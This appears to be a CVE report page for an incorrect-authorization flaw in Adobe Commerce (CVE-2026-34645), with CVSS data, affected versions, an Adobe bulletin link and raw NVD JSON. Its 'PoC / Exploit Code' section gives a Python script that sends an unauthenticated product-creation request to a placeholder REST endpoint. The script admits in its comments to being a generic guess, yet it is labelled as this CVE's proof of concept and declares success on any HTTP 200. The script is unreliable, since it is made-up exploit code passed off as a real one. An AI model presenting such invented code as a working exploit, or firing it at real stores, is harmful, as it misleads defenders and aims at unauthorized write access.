Security Vulnerability Report
CVE-2026-34645 CVSS 7.5 HIGH

CVE-2026-34645

Published: 2026-05-12 20:16:35
Last Modified: 2026-05-13 14:49:12

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet; the record is still marked "Undergoing Analysis". Affected versions, taken from the description:

Adobe Commerce <= 2.4.9-beta1
Adobe Commerce <= 2.4.8-p4
Adobe Commerce <= 2.4.7-p9
Adobe Commerce <= 2.4.6-p14
Adobe Commerce <= 2.4.5-p16
Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34645: Adobe Commerce Incorrect Authorization
# Description: Exploits incorrect authorization to gain unauthorized write access.
import requests


def exploit(target_url):
    # The vulnerable endpoint might vary based on the specific implementation
    # This is a generic example targeting an API endpoint that should be protected
    endpoint = f"{target_url}/rest/V1/vulnerable/endpoint"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-34645-Exploit"
    }
    # Payload attempting to write unauthorized data
    payload = {
        "product": {
            "name": "Malicious Product",
            "price": 0,
            "status": 1
        }
    }
    try:
        print(f"[+] Sending exploit request to {endpoint}...")
        # No authentication token is sent due to PR:N (No Privileges Required)
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful! Unauthorized write access confirmed.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status Code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    target = "http://example.com"  # Replace with actual target
    exploit(target)

References

Adobe security bulletin APSB26-49: https://helpx.adobe.com/security/products/magento/apsb26-49.html

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34645",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T20:16:35.423",
    "lastModified": "2026-05-13T14:49:11.830",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html",
        "source": "[email protected]"
      }
    ]
  }
}